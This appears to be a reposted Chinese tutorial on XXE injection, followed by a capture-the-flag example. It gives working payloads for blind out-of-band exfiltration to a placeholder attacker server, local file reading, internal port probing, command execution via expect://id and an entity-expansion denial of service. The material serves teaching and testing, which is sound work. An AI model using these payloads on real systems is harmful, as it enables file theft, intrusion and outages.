網(wǎng)站首頁 編程語言 正文
引文
在平常的WEB滲透中,我們經(jīng)常會遇到SQL注入、文件上傳、SSRF、CSRF等一系列的漏洞,但XXE漏洞在座的讀者們了解過嗎。今天帶大家了解一下這個危險程度同樣很高的XXE漏洞。
簡介
Xml外部實體注入漏洞(XML External Entity Injection)簡稱XXE,XXE漏洞發(fā)生在應(yīng)用程序解析XML輸入時,沒有禁止外部實體的加載,導(dǎo)致可以構(gòu)造加載惡意外部文件,進(jìn)而通過惡意外部文件對服務(wù)器進(jìn)行攻擊。
基礎(chǔ)知識
在了解XXE漏洞前,我們先看看什么是XML實體。XML根據(jù)簡單概括為如下:可擴展標(biāo)記語言 (Extensible Markup Language, XML) ,標(biāo)準(zhǔn)通用標(biāo)記語言的子集,可以用來標(biāo)記數(shù)據(jù)、定義數(shù)據(jù)類型,是一種允許用戶對自己的標(biāo)記語言進(jìn)行定義的源語言。 XML是標(biāo)準(zhǔn)通用標(biāo)記語言 可擴展性良好,內(nèi)容與形式分離,遵循嚴(yán)格的語法要求,保值性良好等優(yōu)點。
可能單看文字讀者們不太好理解,下面給大家簡單舉個例子:
上圖就是一個簡單的XML實體,用代碼顯示可以展示為:
<bookstore>
<book category="COOKING">
<title lang="en">Everyday Italian</title>
<author>Giada De Laurentiis</author>
<year>2005</year>
<price>30.00</price>
</book>
<book category="CHILDREN">
<title lang="en">Harry Potter</title>
<author>J K. Rowling</author>
<year>2005</year>
<price>29.99</price>
</book>
<book category="WEB">
<title lang="en">Learning XML</title>
<author>Erik T. Ray</author>
<year>2003</year>
<price>39.95</price>
</book>
</bookstore>
其中根的元素是 bookstore,book中 元素有子元素:author、title、year、price。
DTD
DTD(文檔類型定義)可以合法的定義xml標(biāo)簽,DTD 可被成行地聲明于 XML 文檔中,也可作為一個外部引用,接下來帶大家詳細(xì)看一下它的內(nèi)部結(jié)構(gòu)以更好的去理解。
內(nèi)部DOCTYPE聲明
<?xml version="1.0"?> <!DOCTYPE note[ <!--定義此文檔是 note 類型的文檔--> <!ELEMENT note (to,from,heading,body)> <!--定義note元素有四個元素--> <!ELEMENT X (#PCDATA)> <!ELEMENT I (#PCDATA)> <!ELEMENT N (#PCDATA)> <!ELEMENT O (#PCDATA)> ]> <note> <to>I</to> <from>A</from> <head>M</head> <body>XINO!</body> </note>
外部DOCTYPE聲明
<!DOCTYPE 根元素 SYSTEM "URL">
XML實體注入
了解了上面的基礎(chǔ)知識后,我們便可以進(jìn)一步學(xué)習(xí)XXE漏洞。
我們要想利用,首先要判斷服務(wù)器會不會解析XML實體,所以開始時我們先上傳一個測試文件來判斷服務(wù)器是否能解析該類型,如果解析了,我們才可以繼續(xù)利用這個漏洞。
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE ANY [ <!ENTITY name "hello"> ]> <root>&name;</root>
判斷服務(wù)器是否解析之后我們可以看看是否支持外部實體調(diào)用:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE ANY [ <!ENTITY name SYSTEM "vps/hack.dtd"> ]> <root>&name;</root>
判斷完之后就可以做進(jìn)一步測試了,比如:
無回顯XXE(BLIND XXE)
我們將獲取的數(shù)據(jù)發(fā)送到外部的http服務(wù)器上,后面查看http服務(wù)器即可查看到提取的數(shù)據(jù)內(nèi)容。
舉一個最簡單的例子:
#test.xml <!ENTITY % all "<!ENTITY % send SYSTEM 'http://xxx.xxx.xxx.xxx/x.php?1=%file;'" > %all;
對應(yīng)的payload可以寫作為:
<!DOCTYPE ANY[ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag"> <!ENTITY % remote SYSTEM "http://xxx.xxx.xxx.xxx/test.xml"> %remote; %send; ]>
首先對 remote 引用的目的是將外部文件 test.xml 引入到文中,檢測到 send 實體,在節(jié)點中引用 send,就可以成功實現(xiàn)數(shù)據(jù)轉(zhuǎn)發(fā)。也就實現(xiàn)了數(shù)據(jù)的外帶。
讀取任意文件
這個也是XXE比較常用的方法,我們引入(或編輯)一個DOCTYPE元素,該元素定義一個包含文件路徑的外部實體。
探測內(nèi)網(wǎng)端口
我們利用XXE也可以進(jìn)行內(nèi)網(wǎng)探測端口(類似于SSRF),以用來進(jìn)一步對機器照成攻擊:
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY> <!ENTITY xxe SYSTEM "http://127.0.0.1:80">]> <root>
命令執(zhí)行
這個還是比較少見的,因為命令執(zhí)行的條件比較苛刻,要求靶機php裝有expect擴展,但這個擴展是默認(rèn)不安裝的,所以比較難利用。
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "expect://id" >]> <root> <name>&xxe;</name> </root>
dos拒絕服務(wù)
這個不是很了解,在網(wǎng)上瀏覽時注意到的,原理大概是利用迭代參數(shù)實體進(jìn)行拒絕服務(wù),讓服務(wù)器的解析變得非常非常慢。
<?xml version="1.0"?> <!DOCTYPE xml [ <!ENTITY xxe1 "xxe"> <!ENTITY xxe2 "&xxe1;&xxe1;&xxe1;&xxe1;&xxe1;&xxe1;&xxe1;&xxe1;&xxe1;&xxe1;"> <!ENTITY xxe3 "&xxe2;&xxe2;&xxe2;&xxe2;&xxe2;&xxe2;&xxe2;&xxe2;&xxe2;&xxe2;"> <!ENTITY xxe4 "&xxe3;&xxe3;&xxe3;&xxe3;&xxe3;&xxe3;&xxe3;&xxe3;&xxe3;&xxe3;"> <!ENTITY xxe5 "&xxe4;&xxe4;&xxe4;&xxe4;&xxe4;&xxe4;&xxe4;&xxe4;&xxe4;&xxe4;"> <!ENTITY xxe6 "&xxe5;&xxe5;&xxe5;&xxe5;&xxe5;&xxe5;&xxe5;&xxe5;&xxe5;&xxe5;"> ]> <test>&xxe6;</test>
例題
[PHP]XXE
打開是一個登錄界面:
在源碼處會發(fā)現(xiàn):
<button id="go" onclick="XMLFunction()">GO!</button>
可以判斷會解析XML文件,嘗試構(gòu)造payload直接讀取文件:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root[ <!ENTITY admin SYSTEM "file:///flag"> ]> <root> <username>&admin;</username> <password>xino</password> </root>
抓包構(gòu)造惡意數(shù)據(jù)然后發(fā)包:
結(jié)語
原文鏈接:https://juejin.cn/post/7150837705776529421
相關(guān)推薦
- 2022-12-04 Android多功能視頻播放器GSYVideoPlayer開發(fā)流程_Android
- 2023-04-12 Python中如何實現(xiàn)真正的按位取反運算_python
- 2024-01-31 Mybatis plus并發(fā)更新時的問題
- 2022-05-09 Python數(shù)據(jù)結(jié)構(gòu)與算法的雙端隊列詳解_python
- 2022-04-05 Go語言空結(jié)構(gòu)體詳解_Golang
- 2022-12-24 詳解C#?parallel中并行計算的四種寫法總結(jié)_C#教程
- 2023-01-15 Python?pytest.main()運行測試用例_python
- 2022-09-25 Stream流水線的實現(xiàn)原理是什么
- 最近更新
-
- window11 系統(tǒng)安裝 yarn
- 超詳細(xì)win安裝深度學(xué)習(xí)環(huán)境2025年最新版(
- Linux 中運行的top命令 怎么退出?
- MySQL 中decimal 的用法? 存儲小
- get 、set 、toString 方法的使
- @Resource和 @Autowired注解
- Java基礎(chǔ)操作-- 運算符,流程控制 Flo
- 1. Int 和Integer 的區(qū)別,Jav
- spring @retryable不生效的一種
- Spring Security之認(rèn)證信息的處理
- Spring Security之認(rèn)證過濾器
- Spring Security概述快速入門
- Spring Security之配置體系
- 【SpringBoot】SpringCache
- Spring Security之基于方法配置權(quán)
- redisson分布式鎖中waittime的設(shè)
- maven:解決release錯誤:Artif
- restTemplate使用總結(jié)
- Spring Security之安全異常處理
- MybatisPlus優(yōu)雅實現(xiàn)加密?
- Spring ioc容器與Bean的生命周期。
- 【探索SpringCloud】服務(wù)發(fā)現(xiàn)-Nac
- Spring Security之基于HttpR
- Redis 底層數(shù)據(jù)結(jié)構(gòu)-簡單動態(tài)字符串(SD
- arthas操作spring被代理目標(biāo)對象命令
- Spring中的單例模式應(yīng)用詳解
- 聊聊消息隊列,發(fā)送消息的4種方式
- bootspring第三方資源配置管理
- GIT同步修改后的遠(yuǎn)程分支
提供CDN加速